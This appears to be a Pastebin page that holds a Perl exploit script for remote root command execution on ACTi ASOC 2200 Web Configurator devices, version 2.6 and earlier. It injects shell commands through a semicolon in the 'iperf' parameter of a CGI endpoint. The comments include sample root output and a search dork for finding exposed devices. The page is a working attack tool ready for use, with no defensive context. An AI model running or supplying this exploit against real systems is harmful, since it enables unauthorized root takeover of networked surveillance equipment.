Advertisement
hackerscommunity

ACTi Web Configurator <= 2.6 RCE exploit

Jul 11th, 2015
502
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.24 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #  ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
  3. ##
  4. #  Dicovery & Author: Todor Donev
  5. #  Author mail: todor.donev@@gmail.com
  6. #  Type: Hardware
  7. #  Vuln Type and Risk: Remote / High
  8. ##
  9. #  ACTi Corporation is the technology leader in IP surveillance,
  10. #  focusing on multiple security surveillance market segments.
  11. ##
  12. #  root@linux:~# perl actiroot.pl <CENSORED>
  13. #  [+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
  14. #  [+] Gewgl: intitle:"Web Configurator - Version v2.6"
  15. #  # id
  16. #   execute : /sbin/iperf -c ;id  &
  17. #   uid=0(root) gid=0(root)        ### Got Root ? o.O
  18. ##
  19. #  Special kind regards to Tsvetelina Emirska that support me !! :)
  20. #
  21. #  Prayers to all the People in Japan from Bulgaria !!!!!
  22. #
  23. use LWP::Simple;
  24. print "[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution\n";
  25. print "[+] Gewgl: intitle:\"Web Configurator - Version v2.6\"\n";
  26. $host = $ARGV[0];
  27. $cmd = $ARGV[1];
  28. if(! $ARGV[0]) {
  29. print "[+] usage: perl actiroot.pl <host> <cmd>\n";
  30. exit;
  31. }
  32. if(! $ARGV[1]) {
  33. $cmd = "id";
  34. }
  35. my $result = get("http://$host/cgi-bin/test?iperf=;$cmd &");
  36. if (defined $result) {
  37. print "# $cmd\n $result";
  38. }
  39. else {
  40. print "[-] Not Vulnerable\n";
  41. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement